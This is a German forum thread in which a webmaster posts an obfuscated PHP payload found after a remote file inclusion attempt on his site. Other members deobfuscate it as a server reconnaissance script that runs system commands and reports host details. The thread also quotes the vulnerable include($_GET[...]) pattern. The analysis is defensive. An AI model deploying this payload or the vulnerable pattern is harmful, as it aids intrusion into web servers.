Opfer von XSS angriff?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Fuselmeister, 28. November 2009 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 28. November 2009
    Hi ich hab vorhin in der Log von meinem Webspace was interessantes gesehen:
    Könnte das ein versuchter Angriff mit XSS sein? Funktionieren tut das nich, weil ich Teile der Seite nicht mit <?php include($_GET['dsp']); ?> einbinde, würde mich aber interessieren obs wirklich eine attacke wahr...

    in der cmdstate.txt, die offensichtlich eingebunden werden sollte, steht das hier drin:
    Spoiler
    Code:
    <?php
    $x1c="\x64\151\163k\146\162\145e\x73\160\x61\x63\x65"; 
    $x1d="\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce"; 
    $x1e="\x67\145\x74\x63\x77d"; 
    $x1f="\x67e\164\x65\x6e\166"; 
    $x20="\x67\145t\150\157s\x74by\156\x61\155\145";
    $x21="\x70\150\x70\x5fu\x6e\141\155e";
    $x22="\x70\x68\x70\166e\162\163\x69\157n";
    $x23="\163\x70r\x69\x6et\x66";
    $x24="\163tr\154e\x6e";
    $x25="\x73y\163\164\x65\155"; 
    
    function ConvertBytes($x0b){
    global $x1c,$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25;
    $x0c = $x24($x0b);
    if($x0c < 4){return $x23("\045d\040\142", $x0b);}
    
    if($x0c >= 4 && $x0c <=6){return $x23("\045\x30.\x32f\040K\142", $x0b/1024);}
    
    if($x0c >= 7 && $x0c <=9)
    {return $x23("%\x30\056\x32\x66 \115b", $x0b/1024/1024);}
    
    return $x23("%0\x2e\062\146 Gb", $x0b/1024/1024/1024); }
    
    echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076";
    
    $x0d = @$x21();
    $x0e = $x25(uptime);
    $x0f = $x25(id);
    $x10 = @$x1e();
    $x11 = $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105");
    $x12 = $x22();
    $x13 = $_SERVER['SERVER_NAME'];
    $x14 = $x20($x15);
    $x16= $x1c($x10);$x17 = ConvertBytes($x1c($x10));
    if (!$x17) {$x17 = 0;}
    $x18= $x1d($x10);
    $x19 = ConvertBytes($x1d($x10));
    if (!$x19) {$x19 = 0;}
    $x1a = ConvertBytes($x18-$x16);
    $x1b = @PHP_OS;
    echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076";
    echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e";
    echo "os\072 $x1b\x3c\x62\162\x3e";
    echo "\165\x70\164i\155\x65\072 $x0e<\x62\x72\076";
    echo "\x69d\072 $x0f<\142\x72>";
    echo "\160w\x64\x3a $x10<\x62r>";echo "p\150p\x3a\040$x12\x3c\x62\162>";
    echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>";
    echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076";
    echo "s\145\x72ver\x2d\x69p\072 $x14\x3c\x62\162\x3e";echo "f\162\145\145:\040$x17<br\x3e";
    echo "u\163\145d\072\040$x1a\074b\x72>";
    echo "to\164\141\x6c:\x20$x19<\142\x72>";
    exit;
    ?>

    kennt sich da einer näher mit aus?^^

    mfg
    Fuselmeister
     

  2. Anzeige
    Heute: Deals & Sale mit stark reduzierten Angeboten finden.
  3. #2 28. November 2009
    AW: Opfer von XSS angriff?

    Das war keine xss sondern eine rfi. (remote file inclusion)
    sinn einer rfi ist code in den webserver einzuschleusen und auszuführen. (zb eine php shell oder schadcode)
    dies gelingt aber natürlich nur wenn die aufgerufene php ne lücke hat und du ungünstige php settings hast.
     
  4. #3 28. November 2009
    AW: Opfer von XSS angriff?

    Mich würde mal interessieren, was der Code macht....
    Kann das jemand "entschlüsseln"?

    so long
    pampers
     
  5. #4 28. November 2009
    AW: Opfer von XSS angriff?

    Code:
    figbayilofilogba
    figbayilofilogba
    uname -a: Windows NT *_NAME DES BENUTZERS_* 5.1 build 2600
    os: WINNT
    uptime:
    id:
    pwd: C:\xampp\htdocs
    php: 5.2.8
    software: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
    server-name: localhost
    server-ip: 192.168.0.3
    free: 26.74 Gb
    used: 139.27 Gb
    total: 166.02 Gb
    Kommt dabei raus.

    Ist natürlich über Xampp ausgeführt worden.
     
  6. #5 28. November 2009
    AW: Opfer von XSS angriff?

    Das Script ist nur dazu da, um einen möglichen Angriff auf deinen Server zu starten. Dabei sammelt das Script verschiedene Informationen über deinen Server, wie z.B. die komplette Ausgabe von uname, Serverkonfigurationsdatei, um was für einen Server es sich handelt, etc.
    Der Hexadezimalcode wird dabei nur verwendet, um das komplette Script unleserlich zu machen...
     
  7. #6 28. November 2009
    AW: Opfer von XSS angriff?

    PHP:
    <? php

    function  ConvertBytes ( $x0b ){
    [...] 
    Berechnet Speicherplatz etc .
    }

    echo 
    "figbayilofilogba<br>" ;
    echo 
    "figbayilofilogba<br>" ;
    echo 
    "uname -a: @php_uname()<br>" ;
    echo 
    "os: @PHP_OS<br>" ;
    echo 
    "uptime: system(uptime)<br>" ;
    echo 
    "id: system(id)<br>" ;
    echo 
    "pwd: @getcwd()<br>" ;
    echo 
    "php: phpversion()<br>" ;
    echo 
    "software: getenv('SERVER_SOFTWARE')<br>" ;
    echo 
    "server-name:  $_SERVER [ 'SERVER_NAME']<br>" ;
    echo 
    "server-ip: gethostbyname( $x15 )<br>" ;
    echo 
    "free: ConvertBytes( $x1c ( $x10 ))"
    echo  "used: ConvertBytes( $x18 - $x16 )<br>" ;
    echo 
    "total:  $x19 (Ergibt sich aus Funktion ConvertBytes( $x1d ( $x10 )))<br>" ;
    exit;

    ?>
    Hätte editiert, aber da der Beitrag noch nicht freigeschaltet wurde, "musste" ich es nun so machen.

    Skript liest nur Sachen aus und parst danach wahrscheinlich nen paar Sachen um Lücken zu finden. Sollte bei einer normalen Konfiguration aber nicht wirklich funktionieren.
     
  8. #7 28. November 2009
    AW: Opfer von XSS angriff?

    das script würde alle möglichen system-infos ausgeben

    PHP:
    function  ConvertBytes ( $x0b ) {
    $x0c  strlen ( $x0b );
    if(
    $x0c  4 ){return  sprintf ( "%d" $x0b );}

    if(
    $x0c  >=  &&  $x0c  <= 6 ){return  sprintf ( "%0.2f Kb" $x0b / 1024 );}

    if(
    $x0c  >=  &&  $x0c  <= 9 )
    {return 
    sprintf ( "%0.2f Mb" $x0b / 1024 / 1024 );}

    return 
    sprintf ( "%0.2f Gb" $x0b / 1024 / 1024 / 1024 ); }

    $x0d  = @ php_uname ();
    $x0e  system ( uptime );
    $x0f  system ( id );
    $x10  = @ getcwd ();
    $x11  getenv ( "SERVER_SOFTWARE" );
    $x12  phpversion ();
    $x13  $_SERVER [ 'SERVER_NAME' ];
    $x14  gethostbyname ( $x15 );
    $x16 diskfreespace ( $x10 );
    $x17  ConvertBytes ( diskfreespace ( $x10 ));
    if (!
    $x17 ) { $x17  0 ;}
    $x18 disk_total_space ( $x10 );
    $x19  ConvertBytes ( $x1d ( $x10 ));
    if (!
    $x19 ) { $x19  0 ;}
    $x1a  ConvertBytes ( $x18 - $x16 );
    $x1b  = @ PHP_OS ;
    echo 
    "figbayilofilogba" ;
    echo 
    "uname -a:  $x0d <br>" ;
    echo 
    "os:  $x1b <br>" ;
    echo 
    "uptime:  $x0e <br>" ;
    echo 
    "id:  $x0f <br>" ;
    echo 
    "pwd:  $x10 <br>" ;
    echo 
    "php:  $x12 <br>" ;
    echo 
    "software:  $x11 <br>" ;
    echo 
    "server-name:  $x13 <br>" ;
    echo 
    "server-ip:  $x14 <br>" ;
    echo 
    "free:  $x17 <br>" ;
    echo 
    "used:  $x1a <br>" ;
    echo 
    "total:  $x19 <br>" ;
    exit;
    Code:
    uname -a: Windows NT xxx 6.1 build 7600 ((null)) i586
    os: WINNT
    uptime:
    id:
    pwd: D:\Programme\xampplite\htdocs\
    php: 5.3.0
    software: Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0
    server-name: localhost
    server-ip: 192.168.2.100
    free: 176.64 Gb
    used: 423.95 Gb
    total: 600.59 Gb
     
  9. #8 29. November 2009
    AW: Opfer von XSS angriff?

    THX für die Infos... BWs sind raus, soweit es ging ;)

    ich werd mal die Log auf Aktivitäten von 212.159.7.145 im Auge behalten...

    mfg
     

  10. Videos zum Thema
Die Seite wird geladen...